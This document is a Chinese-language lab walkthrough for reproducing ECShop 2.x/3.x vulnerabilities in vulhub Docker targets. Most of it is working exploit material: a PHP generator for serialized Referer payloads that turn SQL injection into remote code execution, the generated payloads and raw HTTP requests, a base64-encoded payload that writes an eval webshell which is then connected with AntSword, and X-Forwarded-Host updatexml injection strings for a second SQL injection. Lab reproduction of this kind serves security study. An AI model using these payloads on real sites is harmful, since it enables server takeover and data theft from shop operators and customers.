xianzhi-2017-02-82239600
启动靶场
在终端里进入事先进入准备好的vulhub靶场目录下,
cd vulhub-master/ecshop/xianzhi-2017-02-82239600
sudo docker-compose up -d
执行命令后
Ecshop2.x:
可在浏览器中输入http://ip:8080,正常访问即为靶场启动成功。
Ecshop3.x:
可在浏览器中输入http://ip:8081,正常访问即为靶场启动成功。
然后分别进行安装即可,数据库地址为mysql,用户名密码均为root
漏洞发现
漏洞成因
- Referer值未做任何验证可被控制直接引用
- 采用_echash做分割,且为定值:2.x:554fcae493e564ee0dc75bdf2ebf94ca、3.x:45ea207d7a2b68c49582d2d22adf953a
- insert_ads函数的sql拼接不规范导致sql注入
- make_val函数拼接字符串,拼接用户输入内容。
经由以上四个步骤即可造成远程代码执行,具体分析可参考文章
漏洞利用
手搓
知道原理后我们就开始利用漏洞了,环境如下:
靶机:192.168.75.146
攻击机:192.168.75.144
首先需要准备准备POC,代码如下:
<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
"num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
"id" => $id
];
$s = serialize($arr);
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>
使用php执行上述代码,生成POC:
POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Ecshop2.x POC利用:
在burp中抓包Ecshop用户登录页面,发送到重放器Repeater里,然后将请求信息替换成下方的POC:
GET /user.php HTTP/1.1
Host: [目标IP]
Referer: [生成的POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1
发送后即可得到如下结果,证明漏洞利用成功。
Ecshop3.x POC利用:
在burp中抓包Ecshop用户登录页面,发送到重放器Repeater里,然后将请求信息替换成下方的POC:
GET /user.php HTTP/1.1
Host: [目标IP]
Referer: [生成的POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1
发送后即可得到如下结果,证明漏洞利用成功。
Get WebShell
生成获取WebShell的POC,代码如下:
<?php
$shell = bin2hex("{\$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk='));//}xxx");
$id = "-1' UNION/*";
$arr = [
"num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
"id" => $id
];
$s = serialize($arr);
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>
// 原型
file_put_contents(‘eval.php’,‘<?php eval($_POST[cmd]); ?>’)
// base64编码
ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk=
生成的Get WebShell Poc如下:
POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
套入POC利用,再用蚁剑即可连接,连接截图如下:
到此,Ecshop xianzhi-2017-02-82239600 Sql注入、远程代码执行漏洞复现结束。
ECShop 4.x collection_list SQL注入
影响范围
Ecshop 2.x
Ecshop 3.x-3.6.0
漏洞成因
可参考:https://mp.weixin.qq.com/s/xHioArEpoAqGlHJPfq3Jiw
漏洞利用
环境准备
名称 | IP |
---|---|
攻击机 | 192.168.159.132 |
靶机 | 192.168.159.129 |
进入靶机的vulhub目录下,输入以下命令启动靶场:
cd ecshop/collection_list-sqli
docker-compose up -d
打开网站http://192.168.159.129:8080,出现安装界面,截图如下:
在安装过程中,数据库地址为mysql
,用户名和密码均为root
。
漏洞复现
首先注册一个测试用户test
,然后登录后点击我的收藏,抓包如下图所示:
手动复现
POC:
X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a
X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:44:"1' and updatexml(1,repeat(user(),2),1) and '";|
可以看到如下图所示: